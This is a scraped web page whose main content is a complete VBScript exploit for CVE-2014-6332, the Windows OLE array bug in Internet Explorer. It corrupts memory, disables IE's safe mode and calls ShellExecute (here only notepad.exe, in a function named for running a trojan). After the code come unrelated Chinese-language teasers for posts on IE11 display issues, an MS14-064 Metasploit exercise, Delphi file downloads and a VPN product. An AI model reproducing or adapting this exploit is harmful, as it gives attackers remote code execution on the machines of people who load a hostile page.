win95+ie3-win10+ie11 0day

alliedve.htm

//*

allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.

cve-2014-6332 exploit

https://twitter.com/yuange75

http://hi.baidu.com/yuange1975

*//

<!doctype html>

<html>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >

<head>

</head>

<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()

On Error Resume Next

set shell=createobject("Shell.Application")

shell.ShellExecute "notepad.exe"

end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()

dim   ab()

dim   a0

dim   a1

dim   a2

dim   a3

dim   win9x

dim   intVersion

dim   rnda

dim   funclass

dim   myarray

Begin()

function Begin()

On Error Resume Next

info=Navigator.UserAgent

if(instr(info,"Win64")>0)   then

exit   function

end if

if (instr(info,"MSIE")>0)   then

intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))

else

exit   function

end if

win9x=0

BeginInit()

If Create()=True Then

myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then

document.write("<br> IE")

document.write(intVersion)

runshellcode()

else

setnotsafemode()

end if

end if

end function

function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=13+17*rnd(6)

a3=7+3*rnd(5)

end function

function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 400

If Over()=True Then

‘   document.write(i)

Create=True

Exit For

End If

Next

end function

sub testaa()

end sub

function mydata()

On Error Resume Next

i=testaa

i=null

redim  Preserve aa(a2)

ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801E-314

aa(a1+2)=myarray

ab(2)=1.74088534731324E-310

mydata=aa(a1)

redim  Preserve aa(a0)

end function

function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+16)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

j=readmemo(i+&h120+k)

if(j=14) then

j=0

redim  Preserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

redim  Preserve aa(a0)

j=0

j=readmemo(i+&h120+k)

Exit for

end if

next

ab(2)=1.69759663316747E-313

runmumaa()

end function

function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000

redim  Preserve aa(a0)

redim   ab(a0)

redim  Preserve aa(a2)

type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then

if(intVersion<4) then

mem=cint(a0+1)*16

j=vartype(aa(a1-1))

if((j=mem+4) or (j*8=mem+8)) then

if(vartype(aa(a1-1))<>0)  Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

else

redim  Preserve aa(a0)

exit  function

end if

else

if(vartype(aa(a1-1))<>0)  Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

end if

end if

If(type1=&h2f66) Then

Over=True

End If

If(type1=&hB9AD) Then

Over=True

win9x=1

End If

redim  Preserve aa(a0)

end function

function ReadMemo(add)

On Error Resume Next

redim  Preserve aa(a2)

ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747E-313

ReadMemo=lenb(aa(a1))

ab(0)=0

redim  Preserve aa(a0)

end function

</script>

</body>

</html>

时间: 2024-08-26 12:43:26

win95+ie3-win10+ie11 0day的相关文章

win10 ie11 以管理员身份运行才正常

和谐版 win10优化后 ie11不能下载 显示不正常, 以管理员身份运行才正常 ,网上攻略 ( “打开并修改注册表使用快捷键[WIN+R]打开命令行窗口,输入regedit打开注册表,在注册表中找HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main ”)无效,(添加账号“Everyone”-“完全控制”后面的“允许”打钩)无效 经过多次探索,我终于找到方法了!! 打开ie安装目录创建快捷方式,发送到桌面 在桌面找到{iexplo

文档大师 在Win10 IE11下,文档集画面无法正常显示Word等Office文档的解决方法

在文档集界面中显示Word文档,是文档大师的一个核心功能. 最近在 Win10 升级到最新版后,发现 无法正常显示Office 文档的问题. 一开始以为是Word版本问题,从2007升级到2016,问题仍没解决. 用关键字“ie11 word 显示不全”搜索,看了几个搜索结果,找到了答案:"关闭IE11". 操作: 1. Win10 控制面板,在卸载软件界面左边栏有“打开和关闭win功能”,打开后将IE前面的对勾去掉 2.重启机器后,打开文档大师,显示正常了. 当然,问题的本质是Win

MS14-064 漏洞测试入侵——20145301

MS14-064 漏洞测试入侵 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术 执行摘要 此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞.最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码.成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码.如果当前用户使用管理用户权限登录,则攻击者可随后安装程序:查

2017-2018-2 20155315《网络对抗技术》Exp5 :MSF基础应用

实验目的 学会用metasploit进行简单的攻击操作 教程 实验内容 metasploit中有六个模块分别是 渗透攻击模块(Exploit Modules) 辅助模块(Auxiliary Modules 攻击载荷(Payload Modules) 空字段模块(Nop Modules) 编码模块(Encoders) 后渗透攻击模块(Post) 本次实验使用的是exploit和auxiliary exploit:渗透攻击模块,指利用某种漏洞对目标主机进行攻击.渗透就是说攻击者通过目标主机上的一个漏

20155209 Exp5 MSF基础应用

Exp5 MSF基础应用 实验准备 在实验之前,上网搜集了很多有关Metasploit渗透测试的资料.对这次实验影响最大的是一篇最受欢迎的10个Metasploit模块和插件.排名第一位的是MSB-MS12-020,比MSB-MS08-067这个经典漏洞的排名还高.我就实验了这个,而且本次实验中很多试了一下这里面的受欢迎漏洞.但是大多数没成功. 实验MSB-MS12-020时,发现他是辅助模块下的漏洞,所以就先写辅助模块的项目. 成功应用任何一个辅助模块 应用MSB-MS12-020辅助模块 漏

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功且唯一) ms17_010_eternalblue:"永恒之蓝"自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功且唯一) 攻击浏览器的实践 ms10_046

SpartanBrowser产品和安全特性简介

v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);}/* Style Definitions */ table.MsoNormalTable {mso-style-name:普通表格; mso-tstyle-rowband-size:0; mso-tstyle-colb

用Delphi实现文件下载的几种方法(三种使用控件的方法)

有个API就是UrlDownloadToFile.不仅如此,Delphi的一些控件也可以轻松实现下载,如NMHTTP,指定NMHTTP1.InputFileMode := ture; 指定Body为本地文件名,指定Get就可以下载了. uses UrlMon; function DownloadFile(Source, Dest: string): Boolean; begin   try     Result := UrlDownloadToFile(nil, PChar(source), P

奥联云安全接入防范BadTunnel攻击

使用VPN来实现基于互联网办公已经广泛普及.此场景下鉴别资源使用人的身份.保护使用者隐私信息.应用系统的安全性.数据的真实性等问题尤为重要.如何保障信息系统不受恶意攻击和入侵,已成为各种应用系统信息化发展所必需考虑和解决的重要问题.传统IPsec/SSL VPN在这样的场景下面临各种挑战.最近披露的Windows的BadTunnel漏洞充分体现了传统安全接入技术的弱点. BadTunnel是Windows史上影响范围最广泛的漏洞,从WIN95到WIN10都受影响,尤其是使用微软不再提供安全更新的